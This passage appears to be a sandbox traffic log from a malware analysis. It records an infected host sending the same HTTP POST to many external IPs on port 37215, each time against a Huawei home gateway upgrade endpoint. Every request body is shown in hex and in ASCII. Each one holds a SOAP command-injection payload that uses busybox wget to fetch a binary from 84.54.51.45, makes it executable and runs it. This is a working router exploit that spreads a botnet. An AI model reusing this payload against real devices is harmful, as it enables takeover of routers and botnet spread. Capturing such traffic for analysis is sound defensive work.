68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            821192.168.2.155635241.247.25.16937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741070986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            822192.168.2.153404041.240.214.6837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741101980 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            823192.168.2.155867241.11.230.8137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741125107 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            824192.168.2.155359241.12.213.20537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741174936 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            825192.168.2.153361041.139.78.15837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741178989 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            826192.168.2.154891241.115.34.15037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741229057 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            827192.168.2.155301841.97.188.6437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741230965 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            828192.168.2.155560841.214.78.16037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741334915 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            829192.168.2.154969041.89.170.15737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741338968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            830192.168.2.155693041.13.189.15737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741342068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            831192.168.2.153301841.40.159.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741342068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
